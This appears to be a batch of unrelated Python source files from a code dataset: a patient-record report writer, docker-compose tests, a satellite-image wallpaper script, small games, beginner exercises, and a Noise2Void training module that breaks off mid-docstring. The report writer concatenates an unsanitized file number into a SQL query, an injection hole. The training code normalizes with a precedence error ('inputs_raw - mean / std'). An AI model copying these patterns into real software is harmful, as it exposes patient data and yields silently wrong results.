+{"seq_id":"499904656","text":"def print_info(cursor, file_number, folders):\n import docx\n from datetime import date\n import helper_function.pccm_names as pccm_names\n import os.path\n module_name = [\"bio_info\", \"nut_supplements\", \"phys_act\", \"habits\", \"family_details\", \"med_history\", \"cancer_history\",\n \"family_cancer\", \"det_by\", \"breast_symptoms\"]\n folder = folders +'/Gen_Info_Docs'\n file_name = \"Folder_\" + (file_number.replace(\"/\", \"_\")) + \".docx\"\n path = os.path.join(folder, file_name)\n p_date_to_print = date.today().strftime('%d-%b-%Y')\n doc = docx.Document()\n doc.add_paragraph((\"File Number \" + file_number), style=\"Title\")\n doc.add_paragraph((\"Document Created on \" + p_date_to_print), style=\"Quote\")\n for index in range(0, len(module_name)):\n col_titles = pccm_names.names_info(module_name[index])\n columns = \", \".join(col_titles)\n sql = 'SELECT ' + columns + ' FROM Patient_Information_History WHERE File_number = \\'' + file_number + \"'\"\n data = cursor.execute(sql)\n data_file = data.fetchall()\n data_print = list(data_file[0])\n text_titles = pccm_names.info_print_all(module_name[index])\n for i in range(0, len(data_print)):\n p = doc.add_paragraph((text_titles[i] + \": \"), style=\"List Bullet\")\n (p.add_run(data_print[i])).bold = True\n doc.add_paragraph()\n doc.save(path)","sub_path":"add_edit/print_gen_info.py","file_name":"print_gen_info.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"143807437","text":"from time import sleep\nfrom unittest import TestCase\n\nfrom nose.tools import assert_raises, assert_equal\n\nfrom docker_conduct.core.app import App\nfrom docker_conduct.core.exceptions import AppInstallError\nfrom docker_conduct.entrypoints.conduct import Conduct\nfrom tests import TEST_REMOTE_URI_LOCAL_DIRECTORY\nfrom tests.helpers import remove_storage_dir, init_storage_dir\n\n__author__ = 'nick'\n\n\n\nclass ConductCommandTests(TestCase):\n\t\"\"\"Tests for the Conduct entrypoint commands\"\"\"\n\n\tapp_name = 'compose-project'\n\tapp_remote = TEST_REMOTE_URI_LOCAL_DIRECTORY\n\n\tdef setUp(self):\n\t\t\"\"\"Remove all installed apps\"\"\"\n\t\tinit_storage_dir()\n\t\tself.conduct = Conduct()\n\n\tdef tearDown(self):\n\t\tremove_storage_dir()\n\n\tdef test_install_local_directory(self):\n\t\t\"\"\"Test that a local directory remote can be installed\"\"\"\n\t\tself.conduct.main(['install', '--name', self.app_name, self.app_remote])\n\n\t\tapp = App.load_by_name(self.app_name)\n\n\t\tself.assertIsNotNone(app)\n\n\t\tself.assertEqual(app.name, self.app_name)\n\n\tdef test_already_retrieved(self):\n\t\t\"\"\"Tests that attempting to install an already installed app fails without deleting the app\"\"\"\n\n\t\t# Install new app\n\t\tself.test_install_local_directory()\n\n\t\twith assert_raises(AppInstallError):\n\t\t\tself.test_install_local_directory()\n\n\tdef test_run(self):\n\t\t\"\"\"Tests that an installed app can be run through docker-compose\"\"\"\n\t\tself.test_install_local_directory()\n\n\t\tself.conduct.main(['compose', self.app_name, 'up', '-d'])\n\n\t\tsleep(5)\n\n\t\tapp = App.load_by_name(self.app_name)\n\n\t\tassert_equal(app.status(), App.STATUS_RUNNING)\n\n\t\tself.conduct.main(['compose', self.app_name, 'stop'])\n\n\t\tassert_equal(app.status(), App.STATUS_OFF)","sub_path":"tests/entrypoint_tests/conduct_tests.py","file_name":"conduct_tests.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"537062124","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nimport cv2\nfrom skimage import io\nimport ctypes\n\n# To do:\n# - Librarify.\n# - Install script\n\n# INSTRUCTIONS\n#\n# Use this at your own risk, I'm not responsible for any damages on your end.\n# I also don't intend to actively develop this, but might help in some situations.\n#\n# SCRIPT SETUP\n# Set destination location for image file below\n# Select desired image below\n# Select desired image resolution below\n#\n# AUTOMATIC WALLPAPER UPDATES\n# Open Task Scheduler (Windows search)\n# Create Task...\n# General Tab\n# \tGive name and description (not important, be creative)\n# \tChange User or Group -> Advanced\n#\t\tFind Now\n#\t\tFind and select your user account, then click OK (formatted as \"Username (email)\" sometimes)\n# \tRun only when user is logged on\n# Triggers\n#\tBegin the task: At log on\n#\tSpecific user: Yourself\n#\tRepeat task every: 10 minutes for a duration of: Indefinitely\n# Actions\n#\tAction: Start a program\n#\tProgram/script: python.exe (or pythonw.exe to run in background)\n#\t\tTo find exe folder, open Python, import sys, print(sys.executable)\n#\tAdd arguments: 'C:/Users///goes-east.py'\n\n# Destination for image. File is overwritten each time to save disk space.\nfile = 'C:/Users///earth.jpg'\n\n# Select an image by uncommenting it. Preview them here: https://www.star.nesdis.noaa.gov/GOES/GOES16_FullDisk.php\ntargetImage = 'GEOCOLOR'\t\t\t# True color daytime, multispectral IR at night\n#targetImage = 'EXTENT'\t\t\t\t# Geostationary Lightning Mapper\n#targetImage = 'AirMass'\t\t\t# RGB composite based on the data from IR and WV\n#targetImage = 'Sandwich'\t\t\t# Multi-spectral blend combines IR band 13 with visual band 3\n#targetImage = 'DMW'\t\t\t\t# Derived Motion Winds\n#targetImage = 'DayCloudPhase'\t\t# RGB used to evaluate the phase of cooling cloud tops\n#targetImage = 'NightMicrophysics'\t# RGB used to distinguish clouds from fog\n#targetImage = '01'\t\t\t\t\t# 0.47um Blue - Visible\n#targetImage = '02'\t\t\t\t\t# 0.64um Red - Visible\n#targetImage = '03'\t\t\t\t\t# 0.86um Veggie - Near IR\n#targetImage = '04'\t\t\t\t\t# 1.37um Cirrus - Near IR\n#targetImage = '05'\t\t\t\t\t# 1.6um Snow-Ice - Near IR\n#targetImage = '06'\t\t\t\t\t# 2.2um Cloud Particle - Near IR\n#targetImage = '07'\t\t\t\t\t# 3.9um Shortwave Window - IR\n#targetImage = '08'\t\t\t\t\t# 6.2um Upper-Level Water Vapor - IR\n#targetImage = '09'\t\t\t\t\t# 6.9um Mid-Level Water Vapor - IR\n#targetImage = '10'\t\t\t\t\t# 7.3um Lower-Level- Water Vapor - IR\n#targetImage = '11'\t\t\t\t\t# 8.4um Cloud Top - IR\n#targetImage = '12'\t\t\t\t\t# 9.6um Ozone - IR\n#targetImage = '13'\t\t\t\t\t# 10.3um Clean Longwave Window - IR\n#targetImage = '14'\t\t\t\t\t# 11.2um Longwave Window - IR\n#targetImage = '15'\t\t\t\t\t# 12.3um Dirty Longwave Window - IR\n#targetImage = '16'\t\t\t\t\t# 13.3um CO2 Longwave - IR\n\n# Select a resolution for your monitor. Recommended: pick one higher than your monitor's vertical resolution.\n#targetResolution = '339x339.jpg'\n#targetResolution = '678x678.jpg'\ntargetResolution = '1808x1808.jpg'\n#targetResolution = '5424x5424.jpg'\n#targetResolution = '10848x10848.jpg'\n\ndef get_image_link():\n    page = requests.get('https://www.star.nesdis.noaa.gov/GOES/GOES16_FullDisk.php')\n    raw_html = page.content\n    html = BeautifulSoup(raw_html, \"html5lib\")\n\n    # all the image links have one of these classes\n    links = html.select('a.FB,a.FBNZ')\n    image_link = None\n\n    for l in links:\n        link_target = l.get_attribute_list('href')[0]\n        if targetImage in link_target:\n            # print(link_target)\n            if (link_target.endswith(targetResolution)):\n                image_link = link_target\n    return image_link\n\n# taken from \"https://stackoverflow.com/questions/16694907/\"\n# \"how-to-download-large-file-in-python-with-requests-py\"\n\ndef download_file(url, file):\n    # print(\"Downloading image from {}\".format(url))\n    r = requests.get(url, stream=True)\n    with open(file, 'wb') as f:\n        for chunk in r.iter_content(chunk_size=1024):\n            if chunk: # filter out keep-alive new chunks\n                f.write(chunk)\n        # f.flush() # commented by recommendation from J.F.Sebastian\n    return file\n\ndef is_valid_image(file):\n    try:\n        img = io.imread(file)\n    except Exception:\n        return False\n    return True\n\ndef setWallpaper():\n\t# Sets desktop wallpaper for Windows\n\tSPI_SET_WALLPAPER = 20\n\tctypes.windll.user32.SystemParametersInfoW(SPI_SET_WALLPAPER, 0, file, 0)\n\ndef fetch_and_set():\n\t# Get latest image (guard the delete so the first run doesn't fail)\n\tif os.path.exists(file):\n\t\tos.remove(file)\n\tlink = get_image_link()\n\tdownload_file(link, file)\n\t\n\t# Add border to image - not really a fan since it makes the image smaller\n\t'''img = cv2.imread(file)\n\tassert is_valid_image(file)\n\theight = img.shape[0]\n\timg = cv2.copyMakeBorder(img, int(0.03 * height), 0, 0, 0, cv2.BORDER_CONSTANT)\n\tcv2.imwrite(file, img)'''\n\t\n\t# Set as desktop wallpaper\n\tsetWallpaper()\n\nfetch_and_set()","sub_path":"goes-east.py","file_name":"goes-east.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"646124959","text":"from agent import Agent\nfrom ally import Ally\nimport globals\nimport random\n\nclass RandomAgent(Agent):\n def __init__(self, board, player):\n super(RandomAgent, self).__init__(board, player)\n\n def randomPlanning(self):\n playerHand = self.player.getHand()\n for _ in range(0, 6):\n if not playerHand or random.random() < 0.9:\n return\n card = random.choice(playerHand)\n if self.player.getResourcesBySphere(card.sphere) >= card.cost:\n self.player.spendResourcesBySphere(card.sphere, card.cost)\n self.player.addToAllies(card)\n\n def randomQuesting(self):\n combinedWillpower = 0\n playerCharacters = self.player.getAllCharacters()\n if not playerCharacters:\n return\n slen = random.randint(0, len(playerCharacters))\n if not slen:\n return\n for _ in range(slen):\n card = random.choice(playerCharacters)\n if not card.isTapped():\n combinedWillpower += card.getWillpower()\n card.tap()\n if self.player.checkIfAllTapped():\n break\n self.resolveQuesting(combinedWillpower)\n\n def randomDefense(self):\n enemiesEngaged = self.board.getEnemiesEngaged()\n if not enemiesEngaged:\n return\n for enemy in enemiesEngaged:\n defender = self.player.declareRandomDefender()\n if defender:\n result = defender.defense - enemy.attack\n if result < 0:\n defender.takeDamage(abs(result))\n else:\n self.player.randomUndefended(enemy.attack)\n\n def randomAttack(self):\n enemiesEngaged = self.board.getEnemiesEngaged()\n untappedCharacters = self.player.getUntappedCharacters()\n if not untappedCharacters or not enemiesEngaged:\n return\n slen = random.randint(0, len(untappedCharacters))\n if not slen:\n return\n playerCharacters = random.sample(untappedCharacters, k=slen)\n self.resolveAttack(playerCharacters, enemiesEngaged)\n","sub_path":"randomAgent.py","file_name":"randomAgent.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"544786488","text":"import pygame\nfrom network import Network\nfrom button import Button\n\nclass App:\n    def __init__(self):\n        print('init')\n        self.btns = [Button(\"Rock\", 50, 500, (0, 0, 0)), Button(\"Scissors\", 250, 500, (255, 0, 0)), Button(\"Paper\", 450, 500, (0, 255, 0))]\n        self.player = None\n        self.game = None\n        self.n = None\n        self.width = 1280\n        self.height = 720\n\n        self.id = -1\n        self.CAPTION = \"BINGO!\"\n        self.SCREEN_RESOLUTION = (1280, 720)\n        pygame.init()\n        pygame.display.set_caption(self.CAPTION)\n        self.screen = pygame.display.set_mode(self.SCREEN_RESOLUTION)\n        self.GAME_STATE = 1\n        self.STATE_WELCOME = 1\n        self.STATE_PLAY = 2\n        self.STATE_WINNER = 3\n        self.count_player = 1\n        self.run = True\n\n    def start(self):\n        print('start')\n        while self.run:\n            if self.GAME_STATE == self.STATE_WELCOME:\n                self.handle_welcome()\n            elif self.GAME_STATE == self.STATE_PLAY:\n                self.handle_play()\n            elif self.GAME_STATE == self.STATE_WINNER:\n                self.handle_winner()\n        pygame.quit()\n\n    def handle_welcome(self):\n        self.screen.fill((128, 128, 128))\n        font = pygame.font.SysFont(\"comicsans\", 60)\n        text = font.render(\"Click to Start Playing!\", 1, (255, 0, 0))\n        self.screen.blit(text, (600, 400))\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                self.run = False\n            if event.type == pygame.MOUSEBUTTONDOWN:\n                self.GAME_STATE = self.STATE_PLAY\n                self.handle_play()\n        pygame.display.update()\n\n    def handle_play(self):\n        print('play')\n        clock = pygame.time.Clock()\n        clock.tick(60)\n        self.n = Network()\n        self.player = int(self.n.getP())\n        while self.run:\n            try:\n                self.game = self.n.send(\"get\")\n            except Exception:\n                self.run = False\n                print(\"Couldn't get game\")\n                break\n\n            if self.game.bothWent():\n                self.redrawWindow()\n                pygame.time.delay(500)\n                try:\n                    self.game = self.n.send(\"reset\")\n                except Exception:\n                    self.run = False\n                    print(\"Couldn't get game\")\n                    break\n\n                font = pygame.font.SysFont(\"comicsans\", 90)\n                if (self.game.winner() == 1 and self.player == 1) or (self.game.winner() == 0 and self.player == 0):\n                    text = font.render(\"You Won!\", 1, (255, 0, 0))\n                elif self.game.winner() == -1:\n                    text = font.render(\"Tie Game!\", 1, (255, 0, 0))\n                else:\n                    text = font.render(\"You Lost...\", 1, (255, 0, 0))\n\n                self.screen.blit(text, (self.width / 2 - text.get_width() / 2, self.height / 2 - text.get_height() / 2))\n                pygame.display.update()\n                pygame.time.delay(2000)\n\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    self.run = False\n                    pygame.quit()\n\n                if event.type == pygame.MOUSEBUTTONDOWN:\n                    pos = pygame.mouse.get_pos()\n                    for btn in self.btns:\n                        if btn.click(pos) and self.game.connected():\n                            if self.player == 0:\n                                if not self.game.p1Went:\n                                    self.n.send(btn.text)\n                            else:\n                                if not self.game.p2Went:\n                                    self.n.send(btn.text)\n\n            self.redrawWindow()\n        # self.screen.fill((128, 128, 128))\n        # for event in pygame.event.get():\n        #     if event.type == pygame.QUIT:\n        #         self.run = False\n        #     if event.type == pygame.MOUSEBUTTONDOWN:\n        #         self.GAME_STATE = self.STATE_WELCOME\n        # pygame.display.update()\n\n    def handle_winner(self):\n        pass\n\n    def redrawWindow(self):\n        self.screen.fill((128, 128, 128))\n\n        if not (self.game.connected()):\n            font = pygame.font.SysFont(\"comicsans\", 80)\n            text = font.render(\"Waiting for Player...\", 1, (255, 0, 0), True)\n            self.screen.blit(text, (self.width / 2 - text.get_width() / 2, self.height / 2 - text.get_height() / 2))\n        else:\n            font = pygame.font.SysFont(\"comicsans\", 60)\n            text = font.render(\"Your Move\", 1, (0, 255, 255))\n            self.screen.blit(text, (80, 200))\n\n            text = font.render(\"Opponents\", 1, (0, 255, 255))\n            self.screen.blit(text, (380, 200))\n\n            move1 = self.game.get_player_move(0)\n            move2 = self.game.get_player_move(1)\n            if self.game.bothWent():\n                text1 = font.render(move1, 1, (0, 0, 0))\n                text2 = font.render(move2, 1, (0, 0, 0))\n            else:\n                if self.game.p1Went and self.player == 0:\n                    text1 = font.render(move1, 1, (0, 0, 0))\n                elif self.game.p1Went:\n                    text1 = font.render(\"Locked In\", 1, (0, 0, 0))\n                else:\n                    text1 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n                if self.game.p2Went and self.player == 1:\n                    text2 = font.render(move2, 1, (0, 0, 0))\n                elif self.game.p2Went:\n                    text2 = font.render(\"Locked In\", 1, (0, 0, 0))\n                else:\n                    text2 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n            if self.player == 1:\n                self.screen.blit(text2, (100, 350))\n                self.screen.blit(text1, (400, 350))\n            else:\n                self.screen.blit(text1, (100, 350))\n                self.screen.blit(text2, (400, 350))\n\n        for btn in self.btns:\n            btn.draw(self.screen)\n\n        pygame.display.update()\n\n\nif __name__ == \"__main__\":\n    app = App()\n    app.start()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"105842502","text":"SALARY_RAISE_FACTOR = 0.05\n# Maps state codes to full state names (the lookup below goes code -> name).\nSTATE_CODE_MAP = {\"NY\": \"New York\", \"LA\": \"Los Angeles\"}\n\ndef update_employee_record(rec):\n    old_sal = rec[\"salary\"]\n    new_sal = old_sal * (1 + SALARY_RAISE_FACTOR)\n    rec[\"salary\"] = new_sal\n    state_code = rec[\"state_code\"]\n    rec[\"state_name\"] = STATE_CODE_MAP[state_code]\n\ninput_data = [\n    {\"employee_name\": \"Ryan\", \"salary\": 100000.0, \"state_code\": \"LA\"},\n    {\"employee_name\": \"Apeach\", \"salary\": 44000.0, \"state_code\": \"NY\"}\n]\n\nfor rec in input_data:\n    update_employee_record(rec)\n    name = rec[\"employee_name\"]\n    salary = rec[\"salary\"]\n    state = rec[\"state_name\"]\n    print(name + ' now lives in ' + state)\n    print('and makes $' + str(salary))\n","sub_path":"first_script.py","file_name":"first_script.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"30602381","text":"def white_space_counting():\n\tsentence = input(\"give me a sentence!\")\n\tspace = 0\n\tfor n in sentence:\n\t\tif n == \" \":\n\t\t\tspace +=1\n\n\tprint(space)\n\ndef delete_white_space():\n\tsentence = input(\"give me a sentence!\")\n\tsentence_list = []\n\tsentence_without_space = \"\"\n\tfor n in sentence:\n\t\tif n == \" \":\n\t\t\tcontinue\n\t\telse:\n\t\t\tsentence_list.append(n)\n\tfor n in sentence_list:\n\t\tsentence_without_space += n\n\tprint(sentence_without_space)\n\n\ndef N_numbers():\n\tNumbers = []\n\tpair_number = 0\n\todd_number = 0\n\todd_sum = 0\n\tnumber_count = 0\n\twhile number_count < 10:\n\t\tNumber = int(input(\"give me a number!\"))\n\t\tNumbers.append(Number)\n\t\tnumber_count += 1\n\n\tfor n in Numbers:\n\t\tif n%2 == 0:\n\t\t\tpair_number +=1\n\t\telif n%2 == 1:\n\t\t\todd_number +=1\n\t\t\todd_sum += n\n\tprint(pair_number)\n\tprint(odd_number)\n\tprint(odd_sum)\n\ndef easter(date):\n\tT = date\n\tA = T%19\n\tB = T%4\n\tC = T%7\n\tD = (19*A +24)% 30\n\tE = (2*B + 4*C+6*D+5)%7\n\tH = 22 + D + E\n\tif H < 31:\n\t\tprint(\"Easter will be on March \" + str(H))\n\telse:\n\t\tprint(\"Easter will be on April \" + str(H-31))\n\ndef count_to_one_thousand():\n\tn_list = []\n\tfor n in range(1000):\n\t\tif n %5 == 0 and n%3 == 0:\n\t\t\tn_list.append(n)\n\tprint(n_list)\n\ndef print_words():\n\tsentence = input(\"give me a sentence\")\n\tword = \"\"\n\n\tfor l in range(len(sentence)):\n\t\tif sentence[l] == \"<\":\n\t\t\twhile sentence[l+1] != \">\":\n\t\t\t\tl += 1\n\t\t\t\tword += sentence[l]\n\t\t\tprint(word)\n\t\t\tword = \"\"\n\ndef lowest_number():\n\tnumbers = []\n\twhile len(numbers) < 10:\n\t\tnumber = int(input(\"give me a number\"))\n\t\tnumbers.append(number)\n\tlowest_N = 3454323\n\tbiggest_N = -3245434\n\tfor n in numbers:\n\t\tif n < lowest_N:\n\t\t\tlowest_N = n\n\t\tif n > biggest_N:\n\t\t\tbiggest_N =n\n\n\tprint(lowest_N)\n\tprint(biggest_N)\n\ndef pitagorasz(befogo_1,befogo_2,atfogo):\n\ta = befogo_1\n\tb = befogo_2\n\tc = atfogo\n\tif ((a*a) + (b*b)) == (c*c):\n\t\tprint(\"this could be a right triangle\")\n\telse:\n\t\tprint(\"this is not a right triangle\")\n\ndef pitagorasz_2_0(a,b,c):\n\tif ((a*a) + (b*b)) == (c*c):\n\t\tprint(\"this could be a right triangle\")\n\telif ((c*c) + (b*b)) == (a*a):\n\t\tprint(\"this could be a right triangle\")\n\telif ((c*c) + (a*a)) == (b*b):\n\t\tprint(\"this could be a right triangle\")\n\telse:\n\t\tprint(\"this is not a right triangle at all\")\n","sub_path":"orientation_week/basic_exercieses/using_if.py","file_name":"using_if.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"431921295","text":"import os\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\nfrom noise_models.utils import image2tensor\r\n\r\n\r\n############################################\r\n# Training the network\r\n############################################\r\n\r\n\r\ndef stratified_coords_2d(num_pix, shape):\r\n '''\r\n Produce a list of approx. 'numPix' random coordinate, sampled from 'shape' using stratified sampling.\r\n '''\r\n box_size = np.round(np.sqrt(shape[0] * shape[1] / num_pix)).astype(np.int)\r\n coords = []\r\n box_count_y = int(np.ceil(shape[0] / box_size))\r\n box_count_x = int(np.ceil(shape[1] / box_size))\r\n for i in range(box_count_y):\r\n for j in range(box_count_x):\r\n y = np.random.randint(0, box_size)\r\n x = np.random.randint(0, box_size)\r\n y = int(i * box_size + y)\r\n x = int(j * box_size + x)\r\n if (y < shape[0] and x < shape[1]):\r\n coords.append((y, x))\r\n return coords\r\n\r\n\r\ndef random_crop_fri(data, size, num_pix, supervised=False, counter=None, augment=True):\r\n '''\r\n Crop a patch from the next image in the dataset.\r\n The patches are augmented by randomly deciding to mirror them and/or rotating them by multiples of 90 degrees.\r\n \r\n Parameters\r\n ----------\r\n data: numpy array\r\n your dataset, should be a stack of 2D images, i.e. a 3D numpy array\r\n size: int\r\n width and height of the patch\r\n num_pix: int\r\n The number of pixels that is to be manipulated/masked N2V style.\r\n dataClean(optional): numpy array\r\n This dataset could hold your target image e.g. clean images.\r\n If it is not provided the function will use the image from 'image' N2V style\r\n counter (optional): int\r\n the index of the next image to be used. \r\n If not set, a random image will be used.\r\n augment: bool\r\n should the patches be randomy flipped and rotated?\r\n \r\n Returns\r\n ----------\r\n img_out: numpy array\r\n Cropped patch from training image\r\n imgOutC: numpy array\r\n Cropped target patch. 
If dataClean was provided it is used as source.\r\n Otherwise its generated N2V style from the training set\r\n mask: numpy array\r\n An image holding marking which pixels should be used to calculate gradients (value 1) and which not (value 0)\r\n counter: int\r\n The updated counter parameter, it is increased by one.\r\n When the counter reaches the end of the dataset, it is reset to zero and the dataset is shuffled.\r\n '''\r\n\r\n if counter is None:\r\n index = np.random.randint(0, data.shape[0])\r\n else:\r\n if counter >= data.shape[0]:\r\n counter = 0\r\n np.random.shuffle(data)\r\n index = counter\r\n counter += 1\r\n\r\n if supervised:\r\n img = data[index, ..., 0]\r\n img_clean = data[index, ..., 1]\r\n manipulate = False\r\n else:\r\n img = data[index]\r\n img_clean = img\r\n manipulate = True\r\n\r\n img_out, img_out_c, mask = random_crop(img, size, num_pix,\r\n img_clean=img_clean,\r\n augment=augment,\r\n manipulate=manipulate)\r\n\r\n return img_out, img_out_c, mask, counter\r\n\r\n\r\ndef random_crop(img, size, num_pix, img_clean=None, augment=True, manipulate=True):\r\n '''\r\n Cuts out a random crop from an image.\r\n Manipulates pixels in the image (N2V style) and produces the corresponding mask of manipulated pixels.\r\n Patches are augmented by randomly deciding to mirror them and/or rotating them by multiples of 90 degrees.\r\n \r\n Parameters\r\n ----------\r\n img: numpy array\r\n your dataset, should be a 2D image\r\n size: int\r\n width and height of the patch\r\n num_pix: int\r\n The number of pixels that is to be manipulated/masked N2V style.\r\n img_clean (optional): numpy array\r\n This dataset could hold your target image e.g. clean images.\r\n If it is not provided the function will use the image from 'image' N2V style\r\n augment: bool\r\n should the patches be randomy flipped and rotated?\r\n \r\n Returns\r\n ---------- \r\n img_out: numpy array\r\n Cropped patch from training image with pixels manipulated N2V style.\r\n img_out_c: numpy array\r\n Cropped target patch. 
Pixels have not been manipulated.\r\n mask: numpy array\r\n An image marking which pixels have been manipulated (value 1) and which not (value 0).\r\n In N2V or PN2V only these pixels should be used to calculate gradients.\r\n '''\r\n\r\n assert img.shape[0] >= size\r\n assert img.shape[1] >= size\r\n\r\n x = np.random.randint(0, img.shape[1] - size)\r\n y = np.random.randint(0, img.shape[0] - size)\r\n\r\n img_out = img[y:y + size, x:x + size].copy()\r\n img_out_c = img_clean[y:y + size, x:x + size].copy()\r\n\r\n max_a = img_out.shape[1] - 1\r\n max_b = img_out.shape[0] - 1\r\n\r\n if manipulate:\r\n mask = np.zeros(img_out.shape)\r\n hot_pixels = stratified_coords_2d(num_pix, img_out.shape)\r\n for p in hot_pixels:\r\n a, b = p[1], p[0]\r\n\r\n roi_min_a = max(a - 2, 0)\r\n roi_max_a = min(a + 3, max_a)\r\n roi_min_b = max(b - 2, 0)\r\n roi_max_b = min(b + 3, max_b)\r\n roi = img_out[roi_min_b:roi_max_b, roi_min_a:roi_max_a]\r\n a_ = 2\r\n b_ = 2\r\n while a_ == 2 and b_ == 2:\r\n a_ = np.random.randint(0, roi.shape[1])\r\n b_ = np.random.randint(0, roi.shape[0])\r\n\r\n repl = roi[b_, a_]\r\n img_out[b, a] = repl\r\n mask[b, a] = 1.0\r\n else:\r\n mask = np.ones(img_out.shape)\r\n\r\n if augment:\r\n rot = np.random.randint(0, 4)\r\n img_out = np.array(np.rot90(img_out, rot))\r\n img_out_c = np.array(np.rot90(img_out_c, rot))\r\n mask = np.array(np.rot90(mask, rot))\r\n if np.random.choice((True, False)):\r\n img_out = np.array(np.flip(img_out))\r\n img_out_c = np.array(np.flip(img_out_c))\r\n mask = np.array(np.flip(mask))\r\n\r\n return img_out, img_out_c, mask\r\n\r\n\r\ndef training_pred(my_train_data, net, data_counter, size, bs, num_pix, noise_model, optimizer, augment=True,\r\n supervised=True):\r\n '''\r\n This function will assemble a minibatch and process it using the a network.\r\n \r\n Parameters\r\n ----------\r\n my_train_data: numpy array\r\n Your training dataset, should be a stack of 2D images, i.e. a 3D numpy array\r\n net: a pytorch model\r\n the network we want to use\r\n data_counter: int\r\n The index of the next image to be used. 
\r\n size: int\r\n Witdth and height of the training patches that are to be used.\r\n bs: int \r\n The batch patch_size.\r\n num_pix: int\r\n The number of pixels that is to be manipulated/masked N2V style.\r\n augment: bool\r\n should the patches be randomly flipped and rotated?\r\n Returns\r\n ----------\r\n samples: pytorch tensor\r\n The output of the network\r\n labels: pytorch tensor\r\n This is the tensor that was is used a target.\r\n It holds the raw unmanipulated patches.\r\n masks: pytorch tensor\r\n A tensor marking which pixels have been manipulated (value 1) and which not (value 0).\r\n In N2V or PN2V only these pixels should be used to calculate gradients.\r\n dataCounter: int\r\n The updated counter parameter, it is increased by one.\r\n When the counter reaches the end of the dataset, it is reset to zero and the dataset is shuffled.\r\n '''\r\n\r\n # Init Variables\r\n inputs = []\r\n labels = []\r\n masks = []\r\n\r\n # Assemble mini batch\r\n for j in range(bs):\r\n im, l, m, data_counter = random_crop_fri(my_train_data,\r\n size,\r\n num_pix,\r\n counter=data_counter,\r\n augment=augment,\r\n supervised=supervised)\r\n inputs.append(image2tensor(im))\r\n labels.append(image2tensor(l))\r\n masks.append(image2tensor(m))\r\n\r\n # Move to GPU\r\n inputs_raw, labels, masks = tf.stack(inputs)[..., tf.newaxis], tf.stack(labels), tf.stack(masks)[..., tf.newaxis]\r\n\r\n # Move normalization parameter to GPU\r\n std = tf.constant(net.std)\r\n mean = tf.constant(net.mean)\r\n\r\n model_inputs = tf.convert_to_tensor(inputs_raw - mean / std)\r\n # Forward step\r\n with tf.GradientTape(persistent=True) as tape:\r\n outputs = net(model_inputs) * 10.0 # We found that this factor can speed up training\r\n\r\n samples = tf.transpose(outputs, (3, 0, 1, 2))\r\n # Denormalize\r\n samples = samples * std + mean\r\n\r\n pn2v = (noise_model is not None) and (not supervised)\r\n\r\n likelihoods = noise_model.likelihood(labels, samples)\r\n likelihoods_avg = tf.math.log(tf.reduce_mean(likelihoods, axis=0, keepdims=True)[0, ...])\r\n\r\n # Average over pixels and batch\r\n masks = tf.squeeze(masks)\r\n loss = -tf.reduce_sum(likelihoods_avg * masks) / tf.reduce_sum(masks)\r\n\r\n gradients = tape.gradient(loss, net.trainable_variables)\r\n optimizer.apply_gradients(zip(gradients, net.trainable_variables))\r\n return loss\r\n\r\n\r\ndef loss_n2v(samples, labels, masks):\r\n '''\r\n The loss function as described in Eq. 7 of the paper.\r\n '''\r\n\r\n errors = (labels - tf.reduce_mean(samples, axis=0)) ** 2\r\n\r\n # Average over pixels and batch\r\n loss = tf.reduce_sum(errors * masks) / tf.reduce_sum(masks)\r\n return loss\r\n\r\n\r\ndef loss_pn2v(samples, labels, masks, noiseModel):\r\n '''\r\n The loss function as described in Eq. 
7 of the paper.\r\n    '''\r\n\r\n    likelihoods = noiseModel.likelihood(labels, samples)\r\n    likelihoods_avg = tf.math.log(tf.reduce_mean(likelihoods, axis=0, keepdims=True)[0, ...])\r\n\r\n    # Average over pixels and batch\r\n    masks = tf.squeeze(masks)\r\n    loss = -tf.reduce_sum(likelihoods_avg * masks) / tf.reduce_sum(masks)\r\n    return loss\r\n\r\n\r\ndef loss_obj(samples, labels, masks, noiseModel, pn2v, std=None):\r\n    '''\r\n    Dispatch to the PN2V likelihood loss or to the variance-scaled N2V MSE loss.\r\n    '''\r\n    if pn2v:\r\n        return loss_pn2v(samples, labels, masks, noiseModel)\r\n    else:\r\n        return loss_n2v(samples, labels, masks) / (std ** 2)\r\n\r\n\r\ndef train_network(net, train_data, val_data, noise_model, postfix,\r\n                  directory='.',\r\n                  epochs=200, steps_per_epoch=50,\r\n                  batch_size=4, patch_size=100,\r\n                  num_masked_pixels=100 * 100 / 32.0,\r\n                  virtual_batch_size=20, val_size=20,\r\n                  augment=True,\r\n                  supervised=False\r\n                  ):\r\n    '''\r\n    Train a network using PN2V\r\n\r\n    Parameters\r\n    ----------\r\n    net:\r\n        The network we want to train.\r\n        The number of output channels determines the number of samples that are predicted.\r\n    train_data: numpy array\r\n        Our training image. A 3D array that is interpreted as a stack of 2D images.\r\n    val_data: numpy array\r\n        Our validation image. A 3D array that is interpreted as a stack of 2D images.\r\n    noise_model: NoiseModel\r\n        The noise model we will use during training.\r\n    postfix: string\r\n        This identifier is attached to the names of the files that will be saved during training.\r\n    directory: string\r\n        The directory all files will be saved to.\r\n    epochs: int\r\n        Number of training epochs.\r\n    steps_per_epoch: int\r\n        Number of gradient steps per epoch.\r\n  